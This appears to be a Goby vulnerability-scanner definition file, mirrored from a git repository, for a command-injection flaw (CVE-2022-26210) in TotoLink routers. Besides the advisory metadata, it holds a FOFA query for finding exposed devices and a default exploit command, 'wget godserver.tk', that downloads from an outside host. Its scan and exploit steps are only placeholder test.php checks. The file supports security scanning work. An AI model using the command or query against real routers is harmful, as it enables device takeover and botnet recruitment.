qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/TotoLink-FileName-RCE(CVE-2...

149 lines
5.3 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "TotoLink FileName RCE(CVE-2022-26210)",
"Description": "<p>TotoLink A800R, A810R, A830R, A950RG, A3000RU and A3100R and other routers are all products of TotoLink Company in Taiwan, China.<br></p><p>The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.<br></p>",
"Product": "TotoLink",
"Homepage": "https://www.totolink.net/",
"DisclosureDate": "2022-04-02",
"Author": "abszse",
"FofaQuery": "body=\"cstecgi.cgi\"",
"GobyQuery": "body=\"cstecgi.cgi\"",
"Level": "3",
"Impact": "<p>The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.<br></p>",
"Recommendation": "<p>At present, the manufacturer has released an upgrade patch to fix the vulnerability. For details, please pay attention to the manufacturer's homepage: <a href=\"https://www.totolink.net/\">https://www.totolink.net/</a><br></p>",
"References": [
"https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "wget godserver.tk",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"Command Execution"
],
"VulType": [
"Command Execution"
],
"CVEIDs": [
"CVE-2022-26210"
],
"CNNVD": [
"CNNVD-202203-1482"
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "TotoLink 多款无线路由器 FileName 命令执行漏洞 (CVE-2022-26210)",
"Product": "TotoLink多款路由器",
"Description": "<p>TotoLink A800R、A810R、A830R、A950RG、A3000RU 和 A3100R等多款路由器是都是中国台湾吉翁电子TotoLink公司的产品。<br></p><p>TotoLink 多款路由器FileName 参数在函数 setUpgradeFW 中包含命令注入漏洞。此漏洞允许攻击者通过精心制作的请求执行任意命令。<br></p>",
"Recommendation": "<p>目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页:<a href=\"https://www.totolink.net/\">https://www.totolink.net/</a><br></p>",
"Impact": "<p>TotoLink 多款路由器FileName 参数在函数 setUpgradeFW 中包含命令注入漏洞。此漏洞允许攻击者通过精心制作的请求执行任意命令。<br></p>",
"VulType": [
"命令执⾏"
],
"Tags": [
"命令执⾏"
]
},
"EN": {
"Name": "TotoLink FileName RCE(CVE-2022-26210)",
"Product": "TotoLink",
"Description": "<p>TotoLink A800R, A810R, A830R, A950RG, A3000RU and A3100R and other routers are all products of TotoLink Company in Taiwan, China.<br></p><p>The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.<br></p>",
"Recommendation": "<p>At present, the manufacturer has released an upgrade patch to fix the vulnerability. For details, please pay attention to the manufacturer's homepage: <a href=\"https://www.totolink.net/\">https://www.totolink.net/</a><br></p>",
"Impact": "<p>The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.<br></p>",
"VulType": [
"Command Execution"
],
"Tags": [
"Command Execution"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink